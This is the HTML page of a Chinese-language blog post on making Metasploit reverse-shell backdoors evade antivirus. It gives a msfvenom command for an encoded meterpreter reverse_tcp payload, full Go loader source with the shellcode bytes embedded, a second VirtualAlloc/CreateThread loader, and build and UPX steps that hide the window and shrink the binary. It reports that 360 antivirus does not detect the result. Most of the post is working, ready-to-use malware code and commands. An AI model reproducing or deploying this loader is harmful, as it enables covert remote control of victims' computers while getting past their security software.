<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="Cache-Control" content="no-siteapp">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1, minimum-scale=1, maximum-scale=1">
<meta name="renderer" content="webkit">
<meta name="google" value="notranslate">
<meta name="robots" content="index,follow">


<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Akkuman">
<meta name="twitter:description" content="Akkuman的技术博客">
<meta name="twitter:image:src" content="http://127.0.0.1:8000/images/avatar.png">

<meta property="og:url" content="http://127.0.0.1:8000">
<meta property="og:title" content="Akkuman">
<meta property="og:description" content="Akkuman的技术博客">
<meta property="og:site_name" content="Akkuman">
<meta property="og:image" content="http://127.0.0.1:8000/images/avatar.png">
<meta property="og:type" content="website">
<meta name="robots" content="noodp">

<meta itemprop="name" content="Akkuman">
<meta itemprop="description" content="Akkuman的技术博客">
<meta itemprop="image" content="http://127.0.0.1:8000/images/avatar.png">

<link rel="canonical" href="http://127.0.0.1:8000">

<link rel="shortcut icon" href="/favicon.png">
<link rel="apple-itouch-icon" href="/favicon.png">

<link type="text/css" rel="stylesheet" href="https://cdn.bootcss.com/bootstrap/4.0.0/css/bootstrap.min.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/prism.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/zoom.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/main.css">
<script src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>



<script>var cPlayers = [];var cPlayerOptions = [];</script>


<script type="text/javascript">
    var timeSinceLang = {
        year: '年前',
        month: '个月前',
        day: '天前',
        hour: '小时前',
        minute: '分钟前',
        second: '秒前'
    };
    var root = '';
</script>


        <meta name="keywords" content="Hacker,">
        <meta name="description" content="关于msf反弹后门的免杀Tips">
        <meta name="author" content="Akkuman">
        <title>关于msf反弹后门的免杀Tips</title>
    </head>
    <body>
        
        <header id="header" class="clearfix">
  <div class="container-fluid">
      <div class="row">
          <div class="logo">
              <div class="header-logo">
                <script>
                  var getwbclass = function() {
                    var wbclass = ['b', 'w'];
                    return wbclass[Math.floor(Math.random()*wbclass.length)];
                  }
                  var sitetitle = "Akkuman";
                  for (i in sitetitle) {
                    document.write('<a href="/"><span class="' + getwbclass() + ' titlechar">' + sitetitle.charAt(i) + '</span></a>');
                  }          
                  
                </script>
                
                <a id="btn-menu" href="javascript:isMenu();">
                    <span class="b">·</span>
                </a>
                <a href="javascript:isMenu1();">
                    <span id="menu-1" class="bf">1</span>
                </a>
                <a href="javascript:isMenu2();">
                    <span id="menu-2" class="bf">2</span>
                </a>
                <a href="javascript:isMenu3();">
                    <span id="menu-3" class="bf">3</span>
                </a>
              </div>
              <div id="menu-page">
                <a href="/archive.html"><li>归档</li></a>
                <a href="/tag.html"><li>标签</li></a>
                
                <a href="/atom.xml"><li>订阅</li></a>
                
                <a href="about.html"><li>关于</li></a>
              </div>
              <div id="search-box">
                  <div id="search">
                      <input autocomplete="off" type="text" name="s" id="menu-search" placeholder="搜索..." data-root="" />
                  </div>
              </div>
          </div>
      </div>
  </div>
  </header>
        <div id="body" class="clearfix">
            <div class="container-fluid">
                <div class="row">
                    <div id="main" class="col-12 clearfix" role="main">
                        <article class="posti" itemscope itemtype="http://schema.org/BlogPosting">
                            <h1 class="post-title" itemprop="name headline">关于msf反弹后门的免杀Tips</h1>
                            <div class="post-meta">
                                <p>
                                    Written by <a itemprop="name" href="/about.me.html" rel="author">Akkuman</a> with ♥ on <time datetime="1492664964" itemprop="datePublished"></time> in <a href="/tag/Hacker/index.html">Hacker </a>
                                </p>
                            </div>
                            <div class="post-content" itemprop="articleBody">
                                <p>msf是一个很强大的工具，我经常会在渗透用它来反弹shell，不过它生成的反弹后门会被不少杀软kill，这篇文章只是讲讲我在msf中一个简单的免杀小技巧</p>

<h2>思路</h2>

<p>我以前接触过一款python的远控，其实说是远控，基本也就是nc的功能加了一个服务端的web页面控制并加了一些其他的功能可以用来管理诸多客户机
这款远控我下载下来用过，并用pyinstaller打包成了exe（缺点是体积太过庞大），惊奇的是，360不杀它，然后自己想着其他语言是不是也会这样，于是我用golang写了一个简易版nc反弹，编译之后，也是不查杀的。python和golang有一个共同点，就是可以用来内联C编程，所以C语言的shellcode按理说应该会达到同样的效果</p>

<h2>得到shellcode</h2>

<pre><code class="language-bash">msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py &gt; 1.py
</code></pre>

<p>建议是生成32位的，如果想生成64位也可以，<code>-e x86/shikata_ga_nai -i 11</code>是指用<code>x86/shikata_ga_nai</code>编码迭代11次，然后生成py文件
py文件打开是shellcode，我们接下来对它进行一点小改造，对于python去执行shellcode的方法，相信小伙伴都已经不陌生，在《python灰帽子》中有讲解，我今天要使用的是golang，其实个人认为golang执行shellcode的代码是更简洁的</p>

<h2>Golang环境搭建</h2>

<p>安装Golang32位（建议32位，与前面对应，在测试过程中，如果32位shellcode配合64位golang加32位gcc，就算把golang的GOARCH改为386也依旧会失败，建议一一对应），安装gcc32位（可以使用<a href="http://tdm-gcc.tdragon.net/download">TDM-GCC</a>）</p>

<h2>代码编写</h2>

<pre><code class="language-Golang">package main

/*
void call(char *code) {
    int (*ret)() = (int(*)())code;
    ret();
}
*/
import &quot;C&quot;
import &quot;unsafe&quot;

func main() {
    buf := &quot;&quot;
    buf += &quot;\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c&quot;
    buf += &quot;\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2&quot;
    buf += &quot;\x46\x84\xfd\x72\xee\x0e\xb5\x96\x37\x04\x6d\x63\x9f&quot;
    buf += &quot;\xcc\xa4\x3a\x8e\x8c\xf7\x39\x81\xca\xe4\x42\xff\xce&quot;
    buf += &quot;\xa3\xa2\xdb\x06\xc0\x3f\xaf\x41\x73\xba\xf7\x20\x13&quot;
    buf += &quot;\x98\x8c\xff\xfa\x0a\xda\x6e\xf2\x6d\xc3\x81\x07\xc0&quot;
    buf += &quot;\x1b\x37\xeb\xa2\xa9\x32\x71\xaf\xe9\x20\xd1\xaa\x9e&quot;
    buf += &quot;\xbd\x82\xf3\x81\x1f\xab\xbf\xc4\xd9\x6c\x75\x37\x3a&quot;
    buf += &quot;\x53\x78\x90\x79\xaf\x93\x1b\xb3\x15\x09\xe5\x45\x5c&quot;
    buf += &quot;\x26\x0f\x0d\x16\x52\xf1\x8a\x7e\x8b\xc4\x50\x8e\x0a&quot;
    buf += &quot;\x38\x2f\x2b\x40\x73\x0b\xf0\x51\x5f\xc6\xbf\x04\x47&quot;
    buf += &quot;\x80\x36\xe5\x88\x88\xb3\xfc\xa0\x52\xfe\x92\x81\x8d&quot;
    buf += &quot;\x89\xf2\x6a\xcc\x7f\x9a\xe9\x1a\x30\x73\xa3\x63\x42&quot;
    buf += &quot;\x10\xe9\xcf\x62\xe4\x06\x52\xe1\x8d\x88\xfe\x52\xc4&quot;
    buf += &quot;\xc3\xed\x7a\x0e\x66\x5f\x8c\x2c\xef\xfa\xbd\x8c\x79&quot;
    buf += &quot;\x6c\x01\xe3\x5c\xde\xc4\x8a\x4c\x7d\x34\x32\xb5\x23&quot;
    buf += &quot;\x56\x6c\x52\x3f\x15\x26\x6a\xf8\x6b\x81\x2c\x23\x8d&quot;
    buf += &quot;\x41\x6e\x24\x30\xc6\xcb\xba\x26\xd4\x3b\x37\xd3\xc6&quot;
    buf += &quot;\xa8\x5a\x16\x8f\x1e\x27\xca\xcb\xda\x7f\x74\x62\xb2&quot;
    buf += &quot;\x62\xa6\xb1\xfc\x64\x53\x3a\xa7\xa4\x21\x3d\x79\x08&quot;
    buf += &quot;\x06\x74\x2a\xa2\xe7\x0d\x68\x16\xa3\x96\xe5\xad\x32&quot;
    buf += &quot;\x10\xa3\x0f\x49\xc3\x69\xa7\x5b\x61\x1a\xf8\x1d\x9e&quot;
    buf += &quot;\x9b\x3a\x00\xfc\x18\xc3\x42\x1a\xd6\x44\x5d\xfe\xc5&quot;
    buf += &quot;\xb6\x68\xd2\xad\x24\xda\x74\xa7\xf3\x66\x9a\x42\x7a&quot;
    buf += &quot;\x50\xf0\x0b\x47\xbc\xad\x6c\x1e\xca\xbe\x90\xca\xc3&quot;
    buf += &quot;\x8e\x5b\xde\x66\xe2\xb3\x20\x6f\x38\x17\xc1\xac\xfb&quot;
    buf += &quot;\xd3\x2f\x91\xa7\xff\x65\xd7\xd0\x25\x4c\xd4\xb3\x35&quot;
    buf += &quot;\x38\xa1\x82\xb8\x23\x42\xe9\xa5\x95\x8e\xc4\x35\xca&quot;
    buf += &quot;\x92\xfe\xde\x62\x70\xd6\x7a\x7f\xfd\xfb\xf0\x24\xbd&quot;
    buf += &quot;\x5d\x6d\x3d\x13\xbc\x1d\x25\x54\x9d\x0e\x68\xc8\x9a&quot;
    buf += &quot;\x10\x87\xf0\xc9\xac\x37\x57\x84\x23\x5f\x8a\xc0\xab&quot;
    buf += &quot;\x52\x6e\xae\x79\xa2\xdb\xff\xd8\x41\x28\x8b\xd3\x9d&quot;
    buf += &quot;\x68\x3c\x55\xf2\xfe\x0c\x8a\x38\xdf\xb3\x80\x9b\x70&quot;
    buf += &quot;\x2b\x4e\xe1\xfa\x0b\xfe\xf5\xc3\x1a\x0d\x83\xb0\x69&quot;
    buf += &quot;\xd0\x68\xfb\xe0\xae\xbd\x56\x52\x17\x9a\xf8\x8f\xc0&quot;
    buf += &quot;\x14\x8c\xb0\xf7\x0e\x87\xfa\x54\xf4\x04\x4a\x5a\xc8&quot;
    buf += &quot;\x89\x57\x0e\xbf\x7a\x76\x9b\xfe\xb8\x5f\x31\x42\xec&quot;
    buf += &quot;\xaf\x18\x9e\x3f\xf0\x09\x79\x86\xb3\x08\x29\x50\xfd&quot;
    buf += &quot;\xc3\x46\x7d\x24\x51\x5b\xd0\x81\x19\x6f\xc2\x2c\x17&quot;
    buf += &quot;\xab\xa3\xb7\xd9\x6f\x82\xd9\x37\x5f\x38\x01\xd8\xfd&quot;
    buf += &quot;\xfd\x11\x22\x61\xd0\x92\x45\x37\x4f\x6c\x4e\x91\x3b&quot;
    buf += &quot;\x42\x07\xc5\x77\xdc\x52\xd6\xc7\x9d\x7b\x62\xba\x1c&quot;
    buf += &quot;\x62\x3c\xde\xad\x96\x03\x55\xde\x9d\x52\x5c\x5d\x0c&quot;
    buf += &quot;\x73\x0e\xc3\x4c\xae\x7d\x1c\x7c\x64\xaf\xbb\xce\xa6&quot;
    buf += &quot;\x02\x0e\xb1\x51\xc4\x2d\x1b\x6b\xb7\x7c\xd9\x4b\xc3&quot;
    buf += &quot;\x8c\x43\xd6\x1b\x2a\x4f\x5e\x0a\x9a\xd5\x4d\x45\x64&quot;
    buf += &quot;\x6c\x0c\xc8\xf5\x59\xd7\x45\x36\x85\x99\x8d\x34\x65&quot;
    buf += &quot;\x21\xd3\x3b\x35\xce\x22\x29\x0c\x4e\xca\x48\x3f\x55&quot;
    buf += &quot;\x5d\x1b\xda\x35\xc1\x2d&quot;
    // at your call site, you can send the shellcode directly to the C
    // function by converting it to a pointer of the correct type.
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&amp;shellcode[0])))
}
</code></pre>

<p>以上就是全部代码
其实Golang还有个执行shellcode的方法是不用内联C语言的，但是我这边测试能接到反弹shell，但是执行命令会直接断开，代码我也贴出来</p>

<pre><code class="language-Golang">package main

import (
    &quot;syscall&quot;
    &quot;unsafe&quot;
)

func ThreadExecute(Shellcode []byte) {
    var K32 = syscall.MustLoadDLL(&quot;kernel32.dll&quot;)
    var CreateThread = K32.MustFindProc(&quot;CreateThread&quot;)
    var VirtualAlloc = K32.MustFindProc(&quot;VirtualAlloc&quot;)
    var WaitForSingleObject = K32.MustFindProc(&quot;WaitForSingleObject&quot;)

    Addr, _, _ := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr))

    for i := 0; i &lt; len(Shellcode); i++ {
        AddrPtr[i] = Shellcode[i]
    }

    ThreadAddr, _, _ := CreateThread.Call(0, 0, Addr, 0, 0, 0)
    WaitForSingleObject.Call(ThreadAddr, 0xFFFFFFFF)
}
</code></pre>

<p>关于断开的原因，希望找出原因的能告知我一下，其实我们会发现，内联C是比较简单的</p>

<h2>杀毒测试</h2>

<p>在代码所在目录cmd执行<code>go build</code>得到二进制文件（或者可以用<code>go build -ldflags=&quot;-s -w&quot;</code>减小体积，<code>go build -ldflags=&quot;-H windowsgui -s -w&quot;</code>去掉命令窗口）
<img src="" data-src="https://ooo.0o0.ooo/2017/04/20/58f840f0e9a00.png" alt="" />
<img src="" data-src="https://ooo.0o0.ooo/2017/04/20/58f840f8a704c.png" alt="" /></p>

<p>可以看到360的静态查杀和动态查杀都没有发现
那么是否正常工作呢
<img src="" data-src="https://ooo.0o0.ooo/2017/04/20/58f840f6d4862.png" alt="" /></p>

<p>可以看到完全是没问题的，体积比python编译出来的小的多，编译出来是500多kb，然后经过upx压缩了一下（测试upx压缩后功能依旧正常），降低到了200多kb
<img src="" data-src="https://ooo.0o0.ooo/2017/04/20/58f840dbdc23f.png" alt="" /></p>

<h2>视频</h2>

<p>{% bilibili 9975200 %}</p>

                            </div>
                            <div style="display:block;" class="clearfix">
                                <section style="float:left;">
                                    <span itemprop="keywords" class="tags">
                                        tag(s): <a href="/tag/Hacker/index.html">Hacker </a>
                                    </span>
                                </section>
                                <section style="float:right;">
                                    <span><a id="btn-comments" href="javascript:isComments();">show comments</a></span> · <span><a href="javascript:goBack();">back</a></span> · 
                                    <span><a href="/">home</a></span>
                                </section>
                            </div>
                            



<div id="comments" class="gen">
    <script>
        document.write('<section id="disqus_thread"></section>');
        var site_comment_load = function disqus() {
            var d = document, s = d.createElement('script');
            s.src = '//Akkum4n.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        }
    </script>
</div>

                        </article>
                    </div>
                </div>
            </div>
        </div>
        <footer id="footer" role="contentinfo">
    <div class="container-fluid">
        <div class="row">
        <div class="col-12">
            &copy; 
            <script type="text/javascript">
                document.write(new Date().getFullYear());
            </script>
            <a href="/">Akkuman</a>.
            Using <a target="_blank" href="http://www.chole.io/">Ink</a> & <a target="_blank" href="/">Story</a>.
        </div>
        </div>
    </div>
</footer>

<script src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/bundle/js/prism.js"></script>
<script src="/bundle/js/zoom-vanilla.min.js"></script>
<script src="/bundle/js/main.js"></script>

<script>
    window.onload=function(){
        if (window.location.hash!='') {
          var i=window.location.hash.indexOf('#comment');
          var ii=window.location.hash.indexOf('#respond-post');
          if (i != '-1' || ii != '-1') {
            document.getElementById('btn-comments').innerText='hide comments';
            document.getElementById('comments').style.display='block';
          }
        }
    }

    function isMenu(){
        if(document.getElementById('menu-1').style.display=='inline'||document.getElementById('menu-1').style.display=='block'){
            $('#search-box').fadeOut(200);
            $('#menu-page').fadeOut(200);
            $('#menu-1').fadeOut(500);
            $('#menu-2').fadeOut(400);
            $('#menu-3').fadeOut(300);
        } else {
            $('#menu-1').fadeIn(150);
            $('#menu-2').fadeIn(150);
            $('#menu-3').fadeIn(150);
        }
    }

    function isMenu1(){
        if(document.getElementById('menu-page').style.display=='block'){
            $('#menu-page').fadeOut(300);
        } else {
            $('#menu-page').fadeIn(300);
        }
    }

    function isMenu2(){
        if(document.getElementById('torTree')){
            if(document.getElementById('torTree').style.display=='block'){
                $('#torTree').fadeOut(300);
            } else {
                $('#torTree').fadeIn(300);
            }
        }
    }

    function isMenu3(){
        if(document.getElementById('search-box').style.display=='block'){
            $('#search-box').fadeOut(300);
        } else {
            $('#search-box').fadeIn(300);
        }
    }

    function isComments(){
        if(document.getElementById('btn-comments').innerText=='show comments'){
            document.getElementById('btn-comments').innerText='hide comments';
            document.getElementById('comments').style.display='block';
            site_comment_load();
        } else {
            document.getElementById('btn-comments').innerText='show comments';
            document.getElementById('comments').style.display='none';
        }
    }

    function Search404(){
        $('#menu-1').fadeIn(150);
        $('#menu-2').fadeIn(150);
        $('#menu-3').fadeIn(150);
        $('#search-box').fadeIn(300);
    }

    function goBack(){
        window.history.back();
    }
</script>


<script async>
"use strict";
(function(){
var cp = function(){
    var len = cPlayerOptions.length;
    for(var i=0;i<len;i++){
        var element = document.getElementById('player' + cPlayerOptions[i]['id'])
        while (element.hasChildNodes()) {
            element.removeChild(element.firstChild);
        };
        cPlayers[i] = new cPlayer({
            element: element,
            list: cPlayerOptions[i]['list'],
            });
    };
    cPlayers = [];cPlayerOptions = [];
};
var script = document.createElement('script');
script.type = "text/javascript";
script.src = "https://cdn.bootcss.com/cplayer/3.2.1/cplayer.js";
script.async = true;
if(script.readyState){  
    script.onreadystatechange = function(){
        if (script.readyState == "loaded" ||
            script.readyState == "complete"){
            script.onreadystatechange = null;
            cp();
        }
    };
}else{  
    script.onload = function(){
        cp();
    };
}
document.head.appendChild(script);
})();
</script>

    </body>
</html>
